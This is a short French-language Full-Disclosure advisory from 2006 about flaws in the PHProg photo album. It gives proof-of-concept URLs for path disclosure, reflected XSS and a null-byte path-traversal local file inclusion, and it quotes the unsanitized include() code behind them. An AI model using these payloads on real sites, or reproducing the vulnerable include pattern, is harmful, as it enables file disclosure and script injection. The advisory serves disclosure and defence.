[Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure
...
cdg393 at gmail.com
Mon Sep 11 10:03:49 BST 2006
(11/09/06)
* Produit vulnérable : PHProg ( Album photo en PHP )
* Site officiel du produit : http://www.PHProg.com/
* Failles de sécurité décelées :
1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393
2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>
3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
Ligne 59 => $lang=$_GET['lang'];
Ligne 61 => include("lang/$lang.php");
* Credits : cdg393 : cdg.new.fr =)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060911/b904c689/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.